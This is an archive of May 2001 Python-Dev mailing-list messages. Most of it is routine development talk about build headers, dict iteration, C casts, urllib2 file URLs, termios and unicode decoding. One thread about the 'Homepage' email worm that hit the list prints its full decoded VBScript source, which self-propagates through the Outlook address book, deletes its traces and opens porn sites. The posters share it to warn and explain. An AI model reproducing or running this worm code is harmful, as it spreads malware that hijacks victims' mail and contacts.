References: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain> <15096.1662.137269.996490@cj42289-a.reston1.va.home.com>
Message-ID: <m3pudjscgg.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake, Jr." <fdrake at acm.org> writes:

> Michael Hudson writes:
>  > If you don't include termio.h the build breaks on alpha/OSF1.  This
>  > sounds to me like OSF1's headers are broken (you can't include
>  > sys/ioctl.h without including termio.h first, it seems, or you get
>  > complaints about struct termio being undefined).  So I'd suggest
>  > 
>  > +#ifdef __osf__
>  >  #include <termio.h>
>  > +#endif
>  > 
>  > and then see if the build breaks anywhere else (I love unix).
> 
>   Does it make more sense to do this or to test for termio.h in
> configure?

If you're asking *me*, I have no idea.  I'd hope that no system would
be as broken as osf1 is in this regard, but then I'd have hoped that
osf1 wasn't this broken too...

I guess the test in configure is "safer" in some sense.  Getting this
perfectly right would probably require more autoconf hackery than one
can possibly imagine... ncurses generates an awk script from
./configure that is then run to produce term.h, but I'm not sure that
all of that is devoted to including the right headers.
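For comparison with the `#ifdef __osf__` approach, here is a rough Python sketch of what an autoconf header check amounts to: preprocess a one-line file that includes the header and see whether the compiler succeeds. Using `cc -E` and treating a missing compiler as "header absent" are assumptions of this sketch. It is not what Python's configure script literally runs.

```python
import os
import shutil
import subprocess
import tempfile

def have_header(header, compiler="cc"):
    """Return True if `#include <header>` preprocesses cleanly with `compiler`.

    Mirrors the idea behind autoconf's AC_CHECK_HEADERS; if no compiler is
    found on PATH, the header is reported as unavailable.
    """
    cc = shutil.which(compiler)
    if cc is None:
        return False
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "conftest.c")
        with open(src, "w") as f:
            f.write(f"#include <{header}>\n")
        result = subprocess.run([cc, "-E", src],
                                stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL)
        return result.returncode == 0

# A configure-style decision: only use termio.h where it exists.
HAVE_TERMIO_H = have_header("termio.h")
```

In a real configure script, the result would become `#define HAVE_TERMIO_H 1` in config.h, guarding the include in termios.c. A plain existence test does not capture the OSF1 ordering problem (termio.h before sys/ioctl.h), which is one reason the `__osf__` guard was also on the table.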

can-we-just-have-TERMIOS-back?-ly y'rs
M.

-- 
  Good? Bad? Strap him into the IETF-approved witch-dunking
  apparatus immediately!                        -- NTK now, 21/07/2000


From tim.one at home.com  Wed May  9 08:48:12 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 02:48:12 -0400
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <20010508133638.Z16486@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEAAKBAA.tim.one@home.com>

[Tim]
> Given the new dict iterators in 2.2, there's an easier fast way
> that doesn't mutate the dict even under the covers:
>
> def arb(dict):
>     if dict:
>         return dict.iteritems().next()
>     raise KeyError("arb passed an empty dict")

[Thomas Wouters]
> You probably want:
>
> arb = dict.iteritems().next
>
> so that you don't keep on returning the same key,value pair.

No, I would not want that.  If "arbitrary" suffices, then by defn. *any*
element is "good enough".  If it's not good enough to get the same one back
every time, then I want a stronger guarantee about what arb() returns than
the inexplicable behavior of repeated calls to dict.iteritems().next in the
presence of dict mutation.  But as I've said several times before <wink>, I'm
still asking for an algorithm where arb() is actually useful (as opposed to
.popitem(), which is dead easy to explain in the presence of mutation; your
version of arb() can, e.g., return a given entry more than once, may skip
entries, and may raise StopIteration with unexamined entries remaining in the
dict).
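Tim's objection is easier to see in Python 3, where CPython detects a size change during iteration instead of silently skipping or repeating entries. This sketch contrasts a long-lived iterator with `popitem()`. The dict contents are arbitrary example data.

```python
d = {"a": 1, "b": 2, "c": 3}

# A long-lived iterator, as in Thomas's `arb = dict.iteritems().next`.
next_pair = iter(d.items()).__next__
next_pair()
d["d"] = 4  # mutate the dict between calls
try:
    next_pair()
    outcome = "no error"
except RuntimeError:  # CPython: "dictionary changed size during iteration"
    outcome = "RuntimeError"

# popitem() stays easy to reason about under mutation: each call removes
# and returns one remaining pair, so nothing comes back twice or is skipped.
drained = []
while d:
    key, _value = d.popitem()
    drained.append(key)
    if key == "b":
        d["e"] = 5  # adding while draining is fine; "e" gets popped later
```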

not-inclined-to-accept-shallow-comfort-at-the-cost-of-deep-confusion-ly
    y'rs  - tim


From tim.one at home.com  Wed May  9 09:42:00 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 03:42:00 -0400
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <200105090552.NAA08038@erebus.per.dem.csiro.au>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEADKBAA.tim.one@home.com>

[Mark Favas]
> Changes in the last few hours (hi Tim!)

Hi Mark!  Sorry about that!

> to stringobject compile (I'd guess) on MS

You guess right -- and under two flavors of Windows <wink>.

> (and on Compaq's Tru64 compiler),

Figures.

> but produce the following with gcc on Solaris and FreeBSD:
>
> gcc -c -g -O2 -Wall -Wstrict-prototypes -I. -I./Include
> -DHAVE_CONFIG_H  -o Objects/stringobject.o Objects/stringobject.c
> Objects/stringobject.c: In function `PyString_FromStringAndSize':
> Objects/stringobject.c:76: invalid lvalue in unary `&'
> Objects/stringobject.c:80: invalid lvalue in unary `&'
> Objects/stringobject.c: In function `PyString_FromString':
> Objects/stringobject.c:130: invalid lvalue in unary `&'
> Objects/stringobject.c:134: invalid lvalue in unary `&'
> *** Error code 1

Fair enough:  I tried to use a cast as an lvalue in those 4 places, all of
the form:

    PyString_InternInPlace(&(PyObject *)op);

where op is declared PyStringObject*.  Strictly speaking, that ain't legal,
but changing it to:

    PyObject *t = (PyObject *)op;
    PyString_InternInPlace(&t);

is.  You may wonder WTF the difference is.  That's easy:  the rewrite doesn't
use a cast expression as an lvalue <wink>.
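One caveat applies to the rewrite above. As I understand the CPython 2.x code, `PyString_InternInPlace()` may replace `*p` with an already-interned string and release the original. The caller therefore has to copy `t` back into `op` afterwards, or `op` can be left pointing at a released object. Python 3's `sys.intern()` has the same contract at the Python level: the canonical object is the return value. Here is a minimal sketch with made-up string contents:

```python
import sys

def build(*parts):
    """Join parts at runtime so the result is not a compile-time constant."""
    return "".join(parts)

a = build("intern", "_me_", str(2001))
b = build("intern", "_me_", str(2001))

# sys.intern() returns the canonical object; the argument itself is not
# changed, so the caller must rebind to the return value, much as the C
# caller must copy `t` back into `op`.
a = sys.intern(a)
b = sys.intern(b)
```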

sensible-or-not-it's-checked-in-so-please-try-again-ly y'rs  - tim


From jack at oratrix.nl  Wed May  9 10:16:29 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Wed, 09 May 2001 10:16:29 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge 
In-Reply-To: Message by <skip@pobox.com> ,
	     Tue, 8 May 2001 13:22:17 -0500 , <15096.14681.773554.729550@beluga.mojam.com> 
Message-ID: <20010509081630.84D8D303181@snelboot.oratrix.nl>

> 
>     Jack> It's actually 830 files. ... 120 .c/.h files ...
> 
> How many of those 120 files are variants of existing source files that (in
> theory) could be merged with their mainline counterparts?

None (unless you would count macmodule.c as a variant of posixmodule.c). I 
think macmain.c started out as a clone of pythonmain.c, but I think they're 
too different to merge (but I'll have a look).

Hmm, now that I think of it macmodule and posixmodule could possibly be 
merged.

It's fun to see how many statistics I gather about MacPython in just a few
days:-)
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From tim.one at home.com  Wed May  9 10:20:12 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 04:20:12 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <20010508070501.A25794@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAGKBAA.tim.one@home.com>

[Neil Schemenauer]
> Shouldn't the entry in the __future__ file be:
>
>   nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0))
>
> or am I misunderstanding something?

Until nested_scopes *is* the rule, the Mandatory Release field is just a
guess about the future.  Changing it to (2, 2, 0, "alpha", 0) right *now*
would be wrong, since it would change it from a guess about the future to a
false statement about the present.  It must be changed when nested_scopes
become mandatory; it needn't be changed before then (unless we delay making
them mandatory beyond 2.2 final), although if somebody thinks they have a
good use for moving the guess up, fine, just so long as they don't move the
guess to or before 2.2a0.
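The `_Feature` records discussed here are still available from the `__future__` module, so the final outcome can be checked directly. This is a small sketch, and `is_mandatory()` is a hypothetical helper that is not part of `__future__`:

```python
import __future__
import sys

def is_mandatory(feature, version=None):
    """True if `feature` is always on in `version` (default: running Python)."""
    if version is None:
        version = sys.version_info
    mandatory = feature.getMandatoryRelease()
    # None means the feature was dropped or its mandatory release is undecided.
    return mandatory is not None and tuple(version) >= mandatory

scopes = __future__.nested_scopes
optional_since = scopes.getOptionalRelease()
mandatory_in = scopes.getMandatoryRelease()
```

With these values, the entry Neil proposed, (2, 1, 0, "beta", 1) and (2, 2, 0, "alpha", 0), is what the module records today.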


From thomas at xs4all.net  Wed May  9 10:58:50 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 9 May 2001 10:58:50 +0200
Subject: [Python-Dev] Crashes w/ CVS tree
Message-ID: <20010509105850.F16486@xs4all.nl>

I'm getting a crash with Python compiled from a freshly updated CVS tree,
even when running just './python'. It crashes during the loading of os.pyc.
It doesn't crash if I start python with -S, and it doesn't crash if I remove
*.pyc first:

centurion:~/python/python-2.2/dist/src/linux> ./python 
Python 2.2a0 (#4, May  9 2001, 09:52:29) 
[GCC 2.95.4 20010506 (Debian prerelease)] on linux2
Type "copyright", "credits" or "license" for more information.
>>> 
centurion:~/python/python-2.2/dist/src/linux> ./python
Segmentation fault

If I remove os.pyc only, I get the enlightening:

Fatal Python error: PyString_InternInPlace: strings only please!
Abort (core dumped)

I would blame Tim <wink>, except that when examining the corefile I found
some pointers to other causes. The 'original' crash occurs because
cmp_outcome() is passed an invalid PyObject, with most of its function slots
pointing to the middle of the glibc-internal '__morecore()' function.
Examining the stack off of which the invalid item was popped reveals that
the next-to-last item is an iterator. So maybe I should blame Guido instead,
either for the iterator or for rich comparisons ;)


From thomas at xs4all.net  Wed May  9 11:14:32 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 9 May 2001 11:14:32 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects stringobject.c,2.111,2.112
In-Reply-To: <E14xPZ5-0002g4-00@usw-pr-cvs1.sourceforge.net>; from tim_one@users.sourceforge.net on Wed, May 09, 2001 at 01:43:23AM -0700
References: <20010509105850.F16486@xs4all.nl> <E14xPZ5-0002g4-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010509111432.G16486@xs4all.nl>

On Wed, May 09, 2001 at 01:43:23AM -0700, Tim Peters wrote:
> Update of /cvsroot/python/python/dist/src/Objects
> In directory usw-pr-cvs1:/tmp/cvs-serv10106/python/dist/src/Objects
> 
> Modified Files:
> 	stringobject.c 
> Log Message:
> Sheesh -- repair the dodge around "cast isn't an lvalue" complaints to
> restore correct semantics.

This apparently fixed my problem:

On Wed, May 09, 2001 at 10:58:50AM +0200, Thomas Wouters wrote:
> 
> I'm getting a crash with Python compiled from a freshly updated CVS tree,
> even when running just './python'. It crashes during the loading of os.pyc.
> It doesn't crash if I start python with -S, and it doesn't crash if I remove
> *.pyc first:

That ought to teach me to spend my morning doing something fun -- it turned
out to be useless :-)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one at home.com  Wed May  9 11:29:31 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 05:29:31 -0400
Subject: [Python-Dev] Crashes w/ CVS tree
In-Reply-To: <20010509105850.F16486@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEALKBAA.tim.one@home.com>

[Thomas Wouters]
> I'm getting a crash with Python compiled from a freshly updated CVS
> tree, even when running just './python'.

I did too, for a little while, but it's gone away.

> ...
> Fatal Python error: PyString_InternInPlace: strings only please!
> Abort (core dumped)
>
> I would blame Tim <wink>,

I would too.  Please update, and if stringobject.c changes, try again.

I'm sure this is my fault, but I'm too sleepy to figure out why, and I did
change *something* at random that appeared to make it go away <wink>.

it's-all-gcc's-fault-ly y'rs  - tim


From Greg.Wilson at baltimore.com  Wed May  9 17:49:29 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Wed, 9 May 2001 11:49:29 -0400 
Subject: [Python-Dev] Homepage
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>


Hi!

You've got to see this page! It's really cool ;O)


-------------- next part --------------
A non-text attachment was scrubbed...
Name: homepage.HTML.vbs
Type: application/octet-stream
Size: 2419 bytes
Desc: not available
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010509/144ed4b6/attachment-0001.obj>

From guido at digicool.com  Wed May  9 19:08:22 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 12:08:22 -0500
Subject: [Python-Dev] Homepage
In-Reply-To: Your message of "Wed, 09 May 2001 11:49:29 -0400."
             <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> 
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> 
Message-ID: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>

Greg Wilson's computer was infected by a virus which got propagated to
python-dev.  Do NOT open the attachment!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at pythonware.com  Wed May  9 18:12:00 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Wed, 9 May 2001 18:12:00 +0200
Subject: [Python-Dev] Homepage
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
Message-ID: <00fa01c0d8a2$c8d72b60$e46940d5@hagrid>

Greg's mail program wrote:

> Hi!
>
> You've got to see this page! It's really cool ;O)

> Content-Type: application/octet-stream;
>  name="homepage.HTML.vbs"
> Content-Transfer-Encoding: quoted-printable
> Content-Disposition: attachment;
>  filename="homepage.HTML.vbs"

when will we see the first "homepage.HTML.py" virus?

Cheers /F


From esr at thyrsus.com  Wed May  9 18:20:24 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 9 May 2001 12:20:24 -0400
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 12:08:22PM -0500
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <20010509122024.A416@thyrsus.com>

Guido van Rossum <guido at digicool.com>:
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Some of us -- heh, heh -- aren't vulnerable to attachment trojans.
I could almost (not quite, but almost) love the crackers and script
kiddiez of the world for what they're doing to Microsoft...
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

We shall not cease from exploration, and the end of all our exploring will be
to arrive where we started and know the place for the first time.
	-- T.S. Eliot


From fdrake at cj42289-a.reston1.va.home.com  Wed May  9 18:21:27 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed,  9 May 2001 12:21:27 -0400 (EDT)
Subject: [Python-Dev] [maintenance doc updates]
Message-ID: <20010509162127.52B6228946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/maint-docs/

Incremental update of the maintenance branch (for Python 2.1.1).


From barry at digicool.com  Wed May  9 18:23:26 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 9 May 2001 12:23:26 -0400
Subject: [Python-Dev] Homepage
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
	<200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <15097.28414.354061.170478@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> Greg Wilson's computer was infected by a virus which got
    GvR> propagated to python-dev.  Do NOT open the attachment!

Darn, and I was just finishing up the vbs.el script so my XEmacs/VM
reader could open it.

share-the-pain-share-the-fun-ly y'rs,
-Barry


From fdrake at cj42289-a.reston1.va.home.com  Wed May  9 18:47:27 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed,  9 May 2001 12:47:27 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010509164727.1594428946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update of the development branch (for Python 2.2).


From pedroni at inf.ethz.ch  Wed May  9 19:12:20 2001
From: pedroni at inf.ethz.ch (Samuele Pedroni)
Date: Wed, 9 May 2001 19:12:20 +0200 (MET DST)
Subject: [Python-Dev] Homepage
Message-ID: <200105091712.TAA05172@core.inf.ethz.ch>

Hi.

[GvR]
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Here's the beast ("decrypted" and in a cage):
 ("decrypted" and in a cage):
(we got it also on the old jpython-interest)

MS has really increased computer usability: when I was younger
(and I'm not that old) a bad guy had to use assembler to cause
some damage; now, thanks to MS, which doesn't care much about security
but likely cares a lot about self-confidence, everybody can feel very clever
and proud writing such things ... and spamming the whole internet.

<danger>
On Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO= Createobject("scripting.filesystemobject")
Folder=FSO.GetSpecialFolder(2)

Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
Do While InF.AtEndOfStream<>True
ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
Loop

Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vb$",2,true)
OutF.write ScriptBuffer
OutF.close
Set FSO=Nothing

If WS.regread ("HKCU\software\An\mailed") <> "1" then
Mailit()
End If

Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next

Randomize
r=Int((4*Rnd)+1)
If r=1 then
WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm")
elseif r=2 Then
WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm")
elseif r=3 Then
WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm")
ElseIf r=4 Then
WS.Run("http://sheila.issexy.tv/1.htm")
End If

Function Mailit()
On Error Resume Next
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
	Set Mapi=Outlook.GetNameSpace("MAPI")
	Set Lists=Mapi.AddressLists
	For Each ListIndex In Lists
		If ListIndex.AddressEntries.Count <> 0 Then
			ContactCount = ListIndex.AddressEntries.Count
			For Count= 1 To ContactCount
				Set Mail = Outlook.CreateItem(0)
				Set Contact = ListIndex.AddressEntries(Count)
				Mail.To = Contact.Address
				Mail.Subject = "Homepage"
				Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've 
got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf
				Set Attachment=Mail.Attachments
				Attachment.Add Folder & "\homepage.HTML.vb$"
				Mail.DeleteAfterSubmit = True
				If Mail.To <> "" Then
				Mail.Send
				WS.regwrite "HKCU\software\An\mailed", "1"
			End If
			Next
		End If
	Next
End if
End Function
</danger>

PS: the "decryption" was done in python ;)


From tim.one at home.com  Wed May  9 19:47:22 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 13:47:22 -0400
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKECFKBAA.tim.one@home.com>

[Guido]
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Note that the same virus went out under the name of John G. Michopoulos on
the JPython (not Jython!) mailing list.

Here's detailed info on the virus (incl. simple removal instructions if you
got bit):

http://www.symantec.com/avcenter/venc/data/vbs.vbswg2.d@mm.html

Doesn't appear to be worse than a nuisance.  Anyone who has used Windows
Update within the last year <wink/sigh> and installed the "critical updates"
it recommends should have gotten a popup box warning that the attachment was
trying to access the Address Book, telling you it's probably a virus, and
advising you to accept the "No, don't allow this" default.

you-can-make-it-foolproof-but-not-damnedfool-proof-ly y'rs  - tim


From Greg.Wilson at baltimore.com  Wed May  9 20:50:25 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Wed, 9 May 2001 14:50:25 -0400 
Subject: [Python-Dev] apology
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B690@nsamcanms1.ca.baltimore.com>

My apologies to all --- yes, my machine was hit by a virus
that flooded the known universe with email.

Sorry for any grief it has caused anyone,
Greg


From tim.one at home.com  Wed May  9 21:30:41 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 15:30:41 -0400
Subject: [Python-Dev] test_urllib2 fails on Win98SE
Message-ID: <LNBBLJKPBEHFEDALKOLCAECIKBAA.tim.one@home.com>

test_urllib2 takes > 30 seconds, then fails:

C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py
Traceback (most recent call last):
  File "../lib/test/test_urllib2.py", line 15, in ?
    f = urllib2.urlopen(file_url)
  File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen
    return _opener.open(url, data)
  File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open
    '_open', req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain
    result = func(*args)
  File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open
    return self.open_local_file(req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 923, in open_local_file
    if not host or \
socket.error: host not found

The URL it's passing is

file://c:\code\python\dist\src\lib\urllib2.pyc

If I change test_urllib2's

    file_url = "file://%s" % urllib2.__file__

to (adding another slash)

    file_url = "file:///%s" % urllib2.__file__

then it fails like this instead, but very quickly:

C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py
Traceback (most recent call last):
  File "../lib/test/test_urllib2.py", line 15, in ?
    f = urllib2.urlopen(file_url)
  File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen
    return _opener.open(url, data)
  File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open
    '_open', req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain
    result = func(*args)
  File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open
    return self.open_local_file(req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 925, in open_local_file
    return addinfourl(open(url2pathname(file), 'rb'),
IOError: [Errno 2] No such file or directory: '\\c:\\code\\python\\dist\\src\\lib\\urllib2.pyc'

Here's what I know about URLs: .

Here's what I know about file URLs: .

Here's what I know about file URLs on Windows: .

If I type the original

    file://c:\code\python\dist\src\lib\urllib2.pyc

into IE's address bar, it actually *executes* urllib2.
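For comparison, a minimal sketch of building a file URL from an absolute Windows drive path. It assumes the three-slash, forward-slash form (`file:///c:/...`), which is what modern Python's `pathlib` produces for a Windows drive path; whether the 2001 urllib2 would have accepted it is not established here. `windows_path_to_file_url` is a hypothetical helper, and UNC paths are deliberately not handled.

```python
from urllib.parse import quote


def windows_path_to_file_url(path):
    """Build a file URL from an absolute drive-letter path (hypothetical helper).

    Example: c:\\code\\x.py becomes file:///c:/code/x.py. UNC paths are rejected.
    """
    if len(path) < 2 or path[1] != ":":
        raise ValueError("expected a drive-letter path, got %r" % path)
    # Backslashes are not path separators in URLs, so convert them first.
    url_path = path.replace("\\", "/")
    # Percent-encode everything except the separators and the drive colon.
    return "file:///" + quote(url_path, safe="/:")


print(windows_path_to_file_url(r"c:\code\python\dist\src\lib\urllib2.pyc"))
```

The key difference from the failing test is that no backslashes survive into the URL, so the drive letter is never glued to a leading `\\` when the URL is turned back into a path.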


From mwh at python.net  Wed May  9 21:50:34 2001
From: mwh at python.net (Michael Hudson)
Date: 09 May 2001 20:50:34 +0100
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
In-Reply-To: "Fred L. Drake"'s message of "Mon, 07 May 2001 10:55:37 -0700"
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake" <fdrake at users.sourceforge.net> writes:

> ! 	fd = PyObject_AsFileDescriptor(obj);
> ! 	if (fd == -1) {
> ! 		if (PyInt_Check(obj)) {
                    ^^^^^^^^^^^^^^^^
this is a bit pointless.

I admit

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
TypeError: tcgetattr, arg 1: can't extract file descriptor from "int"

is a bit confusing, but I'm not sure 

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
error: (9, 'Bad file descriptor')

is any better than:

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
ValueError: file descriptor cannot be a negative integer (-2)

which is what you get after applying this patch:

Index: Modules/termios.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Modules/termios.c,v
retrieving revision 2.26
diff -c -r2.26 termios.c
*** Modules/termios.c   2001/05/09 17:53:06     2.26
--- Modules/termios.c   2001/05/09 19:49:52
***************
*** 37,43 ****
        fd = PyObject_AsFileDescriptor(obj);
        if (fd == -1) {
                if (PyInt_Check(obj)) {
!                       fd = PyInt_AS_LONG(obj);
                }
                else {
                        char* tname;
--- 37,43 ----
        fd = PyObject_AsFileDescriptor(obj);
        if (fd == -1) {
                if (PyInt_Check(obj)) {
!                       return 0;
                }
                else {
                        char* tname;

Cheers,
M.


From fdrake at acm.org  Wed May  9 22:09:09 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 9 May 2001 16:09:09 -0400 (EDT)
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
In-Reply-To: <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net>
	<m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com>

Michael Hudson writes:
 > this is a bit pointless.

  You're right!  (Hey, it was your patch. ;)
  I'm checking in a different patch -- essentially,
PyObject_AsFileDescriptor() does the right thing, and we don't ever
need to second guess it.
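A rough Python model of the checks Fred is relying on: accept an int, or call the object's `fileno()` method, then reject negative descriptors with the `ValueError` shown earlier in the thread. `as_file_descriptor` is a hypothetical name, and its messages only approximate those of the C function `PyObject_AsFileDescriptor()`.

```python
def as_file_descriptor(obj):
    """Hypothetical Python model of PyObject_AsFileDescriptor()."""
    if isinstance(obj, int):
        fd = obj
    elif hasattr(obj, "fileno"):
        fd = obj.fileno()
        if not isinstance(fd, int):
            raise TypeError("fileno() returned a non-integer")
    else:
        raise TypeError("argument must be an int, or have a fileno() method")
    # A negative int is rejected here, so callers such as termios never
    # need a separate "is it an int?" fallback of their own.
    if fd < 0:
        raise ValueError("file descriptor cannot be a negative integer (%d)" % fd)
    return fd
```

With this shape, `tcgetattr(-2)` fails with the clear `ValueError` rather than the confusing "can't extract file descriptor from int" message.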


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From mwh at python.net  Wed May  9 22:13:46 2001
From: mwh at python.net (Michael Hudson)
Date: 09 May 2001 21:13:46 +0100
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 02 May 2001 21:55:25 +0200"
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com>
Message-ID: <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> I've attached the patch. Due to a small reorganisation the patch is
> a little longer -- symmetry has its price at C level too ;-)

I may be being dense, but can you explain what's going on here:

->> u'\u00e3'.encode('latin-1')
'\xe3'
->> u'\u00e3'.encode("latin-1").decode("latin-1")
Traceback (most recent call last):
  File "<input>", line 1, in ?
UnicodeError: ASCII encoding error: ordinal not in range(128)

Can you come up with some other example I can use in tomorrow's
python-dev summary?

Cheers,
M.

-- 
  Remember - if all you have is an axe, every problem looks 
  like hours of fun.                                        -- Frossie
               -- http://home.xnet.com/~raven/Sysadmin/ASR.Quotes.html


From mwh at python.net  Wed May  9 22:18:47 2001
From: mwh at python.net (Michael Hudson)
Date: 09 May 2001 21:18:47 +0100
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net> <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk> <15097.41957.820142.77750@cj42289-a.reston1.va.home.com>
Message-ID: <m33daes2c8.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake, Jr." <fdrake at acm.org> writes:

> Michael Hudson writes:
>  > this is a bit pointless.
> 
>   You're right!  (Hey, it was your patch. ;)

